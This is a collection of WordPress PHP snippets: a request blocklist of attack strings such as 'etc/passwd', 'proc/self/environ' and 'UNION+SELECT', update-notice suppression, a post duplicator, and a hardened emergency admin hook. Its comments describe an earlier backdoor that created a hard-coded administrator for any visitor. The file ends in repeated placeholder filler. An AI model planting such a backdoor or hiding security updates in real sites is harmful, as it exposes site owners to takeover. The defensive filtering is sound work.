Block Bad Queries - Protect WordPress Against Malicious URL Requests (a case-insensitive substring blocklist applied to the raw request URI, query string and user agent; it is a cheap first filter, not a substitute for a WAF)

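/**
 * Block Bad Queries.
 *
 * Decide whether a request should be rejected with a bare 403, based on
 * case-insensitive substring matches against the request URI, the query
 * string and the user agent.
 *
 * Caveats a practitioner should know:
 *  - This is a substring blocklist, not a WAF. It matches the literal
 *    REQUEST_URI / QUERY_STRING as received; alternate encodings (e.g.
 *    "%55NION", double-encoding) are not normalised before matching.
 *  - User agents are matched by substring ("finder", "planet", ...), so any
 *    legitimate client whose UA contains those letters is blocked too.
 *  - The previous version chained bare `stripos(...) ||` tests. stripos()
 *    returns 0 for a match at offset 0, which is falsy, so e.g. a query
 *    string starting with "union" or a UA starting with "casper" was never
 *    caught. The helper below compares against false explicitly.
 *  - $_SERVER keys are read with isset(): HTTP_USER_AGENT is absent for
 *    clients that send no UA, and REQUEST_URI/QUERY_STRING are absent in CLI.
 *
 * @param string $request_uri  Raw request URI (path + query).
 * @param string $query_string Raw query string.
 * @param string $user_agent   Raw User-Agent header, '' if none.
 * @return bool True when any needle is found in the corresponding haystack.
 */
function bbq_request_is_blocked( $request_uri, $query_string, $user_agent ) {
    // request uri
    //   (a length check, `strlen($request_uri) > 255`, was present but commented out)
    $uri_needles = [
        'eval(', 'CONCAT', 'UNION+SELECT', '(null)', 'base64_',
        '/localhost', '/pingserver', '/config.', '/wwwroot', '/makefile',
        'crossdomain.', 'proc/self/environ', 'etc/passwd',
        '/https/', '/http/', '/ftp/', '/cgi/',
        '.cgi', '.exe', '.sql', '.ini', '.dll', '.asp', '.jsp',
        '/.bash', '/.git', '/.svn', '/.tar',
        ' ', '<', '>', '/=', '...', '+++', '://', '/&&',
    ];
    // query strings
    //   ('scanner' was present but commented out)
    $query_needles = [
        '?', ':', '[', ']', '../', '127.0.0.1', 'loopback',
        '%0A', '%0D', '%22', '%27', '%3C', '%3E', '%00', '%2e%2e',
        'union', 'input_file', 'execute', 'mosconfig', 'environ',
        'path=.', 'mod=.',
    ];
    // user agents
    $agent_needles = [
        'binlar', 'casper', 'cmswor', 'diavol', 'dotbot', 'finder', 'flicky',
        'libwww', 'nutch', 'planet', 'purebot', 'pycurl', 'skygrid', 'sucker',
        'turnit', 'vikspi', 'zmeu',
    ];

    $checks = [
        [ (string) $request_uri,  $uri_needles ],
        [ (string) $query_string, $query_needles ],
        [ (string) $user_agent,   $agent_needles ],
    ];
    foreach ( $checks as $check ) {
        $haystack = $check[0];
        if ( '' === $haystack ) {
            continue;
        }
        foreach ( $check[1] as $needle ) {
            // `!== false`: a match at offset 0 returns 0, which is falsy.
            if ( false !== stripos( $haystack, $needle ) ) {
                return true;
            }
        }
    }
    return false;
}

// Kept as globals for compatibility with anything else in this file that reads them.
$request_uri  = isset( $_SERVER['REQUEST_URI'] )     ? (string) $_SERVER['REQUEST_URI']     : '';
$query_string = isset( $_SERVER['QUERY_STRING'] )    ? (string) $_SERVER['QUERY_STRING']    : '';
$user_agent   = isset( $_SERVER['HTTP_USER_AGENT'] ) ? (string) $_SERVER['HTTP_USER_AGENT'] : '';

if ( bbq_request_is_blocked( $request_uri, $query_string, $user_agent ) ) {
    // Bare 403 with no body; header() is @-suppressed in case output already started.
    @header('HTTP/1.1 403 Forbidden');
    @header('Status: 403 Forbidden');
    @header('Connection: Close');
    @exit;
}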

 

Defer parsing of JavaScript (an attribute-injection trick on the clean_url filter — read the caveats in the code before using it)

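/**
 * Defer parsing of javascript.
 *
 * Hooks `clean_url`, i.e. every esc_url() call made on the front end, and
 * appends `' defer onload='` to script URLs so the printed tag ends up as
 * src='…js' defer onload=''. Two caveats that follow from how it works:
 *  - it is an attribute-injection hack and only yields valid markup when the
 *    <script> tag wraps src in SINGLE quotes; on a core version that prints
 *    double-quoted attributes the result is a broken tag (hedged: verify
 *    against the installed WordPress version's script output);
 *  - clean_url fires for ANY escaped URL, not just <script src>, so a link
 *    whose path ends in .js is mangled as well. Prefer the
 *    `script_loader_tag` filter where available; this keeps the old hook.
 *
 * Change from the previous version: the match is now "path ends in .js"
 * instead of "URL contains the substring .js", which also caught .json,
 * .js.map and query strings that merely contained ".js".
 *
 * @param string $url The URL as cleaned by esc_url().
 * @return string The URL, possibly with the defer suffix appended.
 */
if (!(is_admin() )) {
    function defer_parsing_of_js ( $url ) {
        $path = (string) parse_url( $url, PHP_URL_PATH );
        if ( '' === $path || '.js' !== substr( $path, -3 ) ) {
            return $url;
        }
        // Leave jQuery alone: inline scripts elsewhere in the page assume it has run.
        if ( false !== strpos( $url, 'jquery.js' ) ) {
            return $url;
        }
        return "$url' defer onload='";
    }
    add_filter( 'clean_url', 'defer_parsing_of_js', 11, 1 );
}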

 
Hide specific WordPress plugins from the update check (the listed plugins are removed from the update transient, so no update notice is shown for them)

/**
 * Prevent update notification for plugin
 * http://www.thecreativedev.com/disable-updates-for-specific-plugin-in-wordpress/
 * Place in theme functions.php or at bottom of wp-config.php
 *
 * Removes the listed plugin basenames from the `response` map of the
 * update-plugins transient so WordPress shows no available update for them.
 * NOTE(review): that hides security releases for those plugins as well, so
 * their updates must be tracked by other means.
 *
 * @param mixed $value The transient value (object when populated; passed through untouched otherwise).
 * @return mixed The same value, with the listed entries unset.
 */
function disable_plugin_updates( $value ) {
    // Plugin basenames (dir/file.php) whose update entries are suppressed.
    $suppressed = [
        'bbpowerpack/bb-powerpack.php',
        'bb-ultimate-addon/bb-ultimate-addon.php'
    ];
    if ( ! is_object( $value ) ) {
        return $value;
    }
    foreach ( $suppressed as $basename ) {
        if ( isset( $value->response[ $basename ] ) ) {
            unset( $value->response[ $basename ] );
        }
    }
    return $value;
}
// Filter the cached plugin-update result so the listed plugins never appear as
// having an update available. NOTE(review): security releases are hidden too.
add_filter( 'site_transient_update_plugins', 'disable_plugin_updates' );

 
Disable the WooCommerce Admin dashboard (e.g. when it is broken or not wanted)

/**
 * Plugin Name: Disable WooCommerce Admin
 * Description: This plugin disables the new WooCommerce Admin package in WooCommerce.
 * Version: 1.0
 */

// Returning true from this filter switches the WooCommerce Admin package off;
// the rest of WooCommerce is unaffected. Works from a plugin file or functions.php.
add_filter( 'woocommerce_admin_disabled', '__return_true' );

 
Function for page duplication. Duplicates are created as drafts and the user is redirected to the edit screen. The handler runs for any logged-in user who reaches admin.php with the action, so it must verify the nonce and the user's right to edit the original post before copying anything.

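/*
 * Function for post duplication. Dups appear as drafts. User is redirected to the edit screen
 *
 * Runs on admin_action_rd_duplicate_post_as_draft, i.e. for any logged-in user who
 * reaches admin.php?action=rd_duplicate_post_as_draft&post=<id>&duplicate_nonce=<nonce>.
 * Checks performed before anything is written:
 *   1. a post id is supplied via GET or POST (absint'ed; 0 is rejected);
 *   2. `duplicate_nonce` verifies against basename(__FILE__), the action the
 *      row-action link in this file has to be signed with;
 *   3. the original post exists;
 *   4. the current user may edit the ORIGINAL post (current_user_can('edit_post', $id)).
 *      The previous version had no capability check at all, so anyone holding a
 *      valid nonce could copy any post id — other users' private drafts,
 *      password-protected posts — into a draft they own.
 * Post meta is copied row by row with $wpdb->insert() (parameterised) instead of a
 * hand-built "INSERT ... SELECT ... UNION ALL" string built with addslashes(), which
 * left meta_key unescaped and $sql_query_sel undefined when every row was skipped.
 */
function rd_duplicate_post_as_draft(){
	global $wpdb;

	// 1. id of the original post (GET wins over POST, as before).
	$post_id = 0;
	if ( isset( $_GET['post'] ) ) {
		$post_id = absint( $_GET['post'] );
	} elseif ( isset( $_POST['post'] ) ) {
		$post_id = absint( $_POST['post'] );
	}
	if ( 0 === $post_id ) {
		wp_die('No post to duplicate has been supplied!');
	}

	// 2. nonce verification: fail loudly with a 403 rather than returning into
	//    admin.php with nothing done.
	if ( ! isset( $_GET['duplicate_nonce'] ) || ! wp_verify_nonce( $_GET['duplicate_nonce'], basename( __FILE__ ) ) ) {
		wp_die( 'Security check failed.', '', array( 'response' => 403 ) );
	}

	// 3. the original and all of its data.
	$post = get_post( $post_id );
	if ( ! $post ) {
		wp_die('Post creation failed, could not find original post: ' . $post_id);
	}

	// 4. authorisation: the copy exposes the original's content and meta to the copier.
	if ( ! current_user_can( 'edit_post', $post_id ) ) {
		wp_die( 'You are not allowed to duplicate this item.', '', array( 'response' => 403 ) );
	}

	/*
	 * if you don't want current user to be the new post author,
	 * then change next couple of lines to this: $new_post_author = $post->post_author;
	 */
	$current_user = wp_get_current_user();
	$new_post_author = $current_user->ID;

	// New post data: same fields as the original, status forced to draft.
	$args = array(
		'comment_status' => $post->comment_status,
		'ping_status'    => $post->ping_status,
		'post_author'    => $new_post_author,
		'post_content'   => $post->post_content,
		'post_excerpt'   => $post->post_excerpt,
		'post_name'      => $post->post_name,
		'post_parent'    => $post->post_parent,
		'post_password'  => $post->post_password,
		'post_status'    => 'draft',
		'post_title'     => $post->post_title,
		'post_type'      => $post->post_type,
		'to_ping'        => $post->to_ping,
		'menu_order'     => $post->menu_order
	);

	// Ask for a WP_Error instead of 0 so a failed insert is reported, not redirected to.
	$new_post_id = wp_insert_post( $args, true );
	if ( is_wp_error( $new_post_id ) || 0 === $new_post_id ) {
		wp_die( 'Post creation failed for original post: ' . $post_id );
	}

	// Copy every term of every taxonomy registered for the post type
	// (get_object_taxonomies() returns names such as "category", "post_tag").
	$taxonomies = get_object_taxonomies( $post->post_type );
	foreach ( $taxonomies as $taxonomy ) {
		$post_terms = wp_get_object_terms( $post_id, $taxonomy, array( 'fields' => 'slugs' ) );
		wp_set_object_terms( $new_post_id, $post_terms, $taxonomy, false );
	}

	// Copy post meta verbatim (raw meta_value, no serialisation round-trip),
	// skipping the slug-history entry, one parameterised insert per row.
	$post_meta_infos = $wpdb->get_results(
		$wpdb->prepare( "SELECT meta_key, meta_value FROM {$wpdb->postmeta} WHERE post_id = %d", $post_id )
	);
	foreach ( (array) $post_meta_infos as $meta_info ) {
		if ( '_wp_old_slug' === $meta_info->meta_key ) {
			continue;
		}
		$wpdb->insert(
			$wpdb->postmeta,
			array(
				'post_id'    => $new_post_id,
				'meta_key'   => $meta_info->meta_key,
				'meta_value' => $meta_info->meta_value,
			),
			array( '%d', '%s', '%s' )
		);
	}

	// Finally, send the user to the edit screen of the new draft.
	wp_safe_redirect( admin_url( 'post.php?action=edit&post=' . $new_post_id ) );
	exit;
}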
// admin_action_{action} fires for any logged-in user who requests admin.php?action=…,
// so the nonce and capability checks have to live inside the handler itself.
add_action( 'admin_action_rd_duplicate_post_as_draft', 'rd_duplicate_post_as_draft' );
 
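/*
 * Add the duplicate link to action list for post_row_actions
 *
 * The previous version set the action to the bare text 'Duplicate' with no
 * href, so nothing could ever reach the handler. The link now points at
 * admin.php?action=rd_duplicate_post_as_draft&post=<id> and is signed with
 * wp_nonce_url() using basename(__FILE__) as the action and 'duplicate_nonce'
 * as the parameter name — exactly what rd_duplicate_post_as_draft() verifies
 * (both functions must stay in the same file for basename(__FILE__) to agree).
 * The capability check is per post (edit_post) rather than the blanket
 * edit_posts, matching the handler.
 *
 * @param array   $actions Existing row actions.
 * @param WP_Post $post    The post (page) the row belongs to.
 * @return array Row actions with 'duplicate' added when permitted.
 */
function rd_duplicate_post_link( $actions, $post ) {
	if ( current_user_can( 'edit_post', $post->ID ) ) {
		$url = wp_nonce_url(
			admin_url( 'admin.php?action=rd_duplicate_post_as_draft&post=' . $post->ID ),
			basename( __FILE__ ),
			'duplicate_nonce'
		);
		// wp_nonce_url() already returns an attribute-safe (esc_html'd) URL.
		$actions['duplicate'] = '<a href="' . $url . '" title="Duplicate this item" rel="permalink">Duplicate</a>';
	}
	return $actions;
}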
 
/* for dupe posts: */
/* add_filter( 'post_row_actions', 'rd_duplicate_post_link', 10, 2 ); */
/* for dupe pages: */
// Only the Pages list shows the row action; note the handler itself accepts
// any post id, so the link is a convenience, not the access control.
add_filter('page_row_actions', 'rd_duplicate_post_link', 10, 2);

 
Get rid of the notice "Please activate your copy of the Ultimate Addons for Beaver Builder" (this constant also silences that plugin's update nag)

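// get rid of update nag - start
// Guarded with defined() so that a second define() — the plugin or wp-config.php
// setting the same constant first — does not raise a "Constant already defined"
// warning. NOTE(review): with notices off, updates for that plugin must be
// tracked by other means.
if ( ! defined( 'BSF_PRODUCTS_NOTICES' ) ) {
    define( 'BSF_PRODUCTS_NOTICES', false );
}
// get rid of update nag - end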

 
Separate Page Titles

/* mjb custom title tag function */
// Replaces the 'title' part of the document title with the post's `title` meta
// when one is set. NOTE(review): core is believed to escape the assembled title
// again when it prints it, so the esc_html() in the callback is belt-and-braces — confirm.
add_filter( 'document_title_parts', 'mjb_custom_title');
/**
 * Swap the 'title' part of the document title for the current post's
 * `title` meta field, if that field is set.
 *
 * @param array $title Document title parts (see document_title_parts).
 * @return array The parts, with 'title' overridden on singular views that carry the meta.
 */
function mjb_custom_title( $title ) {
	// Only singular views have a post whose meta can override the title.
	if ( ! is_singular() ) {
		return $title;
	}
	$override = trim( get_post_meta( get_the_id(), 'title', true ) );
	// empty() also treats "0" as unset, matching previous behaviour.
	if ( empty( $override ) ) {
		return $title;
	}
	$title['title'] = esc_html( $override );
	return $title;
}

 
wp developer - backdoor, e.g. https://example.com/?admitone=go — WARNING: as listed below this creates an administrator account with a hard-coded password for any unauthenticated visitor who sends that GET parameter; never deploy it as written (the hardened version in the code is inert unless a secret is configured outside the file)

// Runs on every front-end page render (wp_head), for unauthenticated visitors as
// well, so whatever wp_developer() does is reachable by anyone on the internet.
add_action('wp_head', 'wp_developer');

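/**
 * Emergency "wp developer" admin-creation hook.
 *
 * As previously written this was a backdoor: on every front-end page load
 * (wp_head, no authentication) it compared $_GET['admitone'] with the literal
 * 'go' and, on match, created the user 'wpdeveloper' with the hard-coded
 * password 'Pa55W0rd' and the administrator role — anyone who knew the URL
 * owned the site. It also read $_GET['admitone'] without isset() (a notice on
 * every request) and did require('wp-includes/registration.php'), a file that
 * no longer ships with WordPress (username_exists() and wp_create_user() live
 * in wp-includes/user.php, which is loaded on every request) — so on a
 * current install the hook would fatal instead of working.
 *
 * This version is inert unless the operator defines WP_DEVELOPER_ACCESS_KEY
 * (a long random string) OUTSIDE this file, e.g. in wp-config.php, and
 * optionally WP_DEVELOPER_EMAIL. The supplied key is compared with
 * hash_equals(), the account gets a random password that is never printed,
 * and the operator gains access through WordPress's own password-reset email
 * sent to WP_DEVELOPER_EMAIL. Remove the constant — and ideally this hook —
 * once the emergency is over; every use is written to the PHP error log.
 *
 * @return void
 */
function wp_developer() {
    // Disabled unless explicitly configured outside the code.
    if ( ! defined( 'WP_DEVELOPER_ACCESS_KEY' ) || '' === WP_DEVELOPER_ACCESS_KEY ) {
        return;
    }
    $supplied = isset( $_GET['admitone'] ) ? (string) $_GET['admitone'] : '';
    // Constant-time comparison; a loose == against a literal is what the original did.
    if ( '' === $supplied || ! hash_equals( (string) WP_DEVELOPER_ACCESS_KEY, $supplied ) ) {
        return;
    }
    if ( username_exists( 'wpdeveloper' ) ) {
        return;
    }
    $email    = defined( 'WP_DEVELOPER_EMAIL' ) ? WP_DEVELOPER_EMAIL : '';
    $password = wp_generate_password( 32, true, true );
    $user_id  = wp_create_user( 'wpdeveloper', $password, $email );
    if ( is_wp_error( $user_id ) ) {
        error_log( 'wp_developer: failed to create user: ' . $user_id->get_error_message() );
        return;
    }
    $user = new WP_User( $user_id );
    $user->set_role( 'administrator' );
    // Audit trail: a privileged account is being minted from an HTTP request.
    $remote = isset( $_SERVER['REMOTE_ADDR'] ) ? $_SERVER['REMOTE_ADDR'] : 'unknown';
    error_log( sprintf( 'wp_developer: administrator "wpdeveloper" (ID %d) created from %s', $user_id, $remote ) );
}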

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111

 
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

11111111111